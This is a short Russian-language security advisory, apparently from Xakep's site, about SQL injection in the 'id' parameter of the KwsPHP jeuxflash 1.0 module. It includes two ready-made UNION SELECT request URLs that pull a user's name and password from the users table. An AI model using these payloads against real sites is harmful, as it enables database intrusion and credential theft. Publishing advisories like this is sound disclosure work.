SQL-инъекция в KwsPHP Module jeuxflash

Рекомендуем почитать:

Xakep #304. IP-камеры на пентестах

Программа: KwsPHP Module jeuxflash 1.0

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Пример:

http://server.com/Path/index.php?mod=jeuxflash&ac=play&id= -1%20union%20select%201,pseudo,3,4,5,6,7,8,9,10%20 from%20users%20where%20id=1--

http://server.com/Path/index.php?mod=jeuxflash&ac=play&id= -1%20union%20select%201,pass,3,4,5,6,7,8,9,10%20 from%20users%20where%20id=1--

SQL-инъекция в KwsPHP Module jeuxflash

Xakep #304. IP-камеры на пентестах

Подпишись на наc в Telegram!

Из рубрики «Взлом»

HTB Axlle. Повышаем привилегии через StandaloneRunner

История двух ATO. Ищем уязвимости в логике обработки email

Пробив веба. Как я обошел 2FA и захватил учетки пользователей

Нанодамп. Как я заново изобрел SafetyKatz для дампа LSASS с NanoDump

Трюки

Не тапай хомяка! Как я автоматизировал игру Hamster Kombat

Кастомный Arch. Создаем образы Arch Linux для десктопа и Raspberry Pi

Диета для Arch Linux. Запускаем Arch на компьютерах с малым объемом памяти

Карманный Arch. Делаем флешку с живым образом Arch Linux

Последние новости

В российской системе для видеоконференций VINTEO исправили 0-day уязвимости

Фишеры стали чаще использовать вложения в формате SVG

Компанию T-Mobile взломали во время недавней атаки на телекомы

Ботнет эксплуатирует 0-day уязвимость в устройствах GeoVision

Самым популярным паролем в 2024 году остается «123456»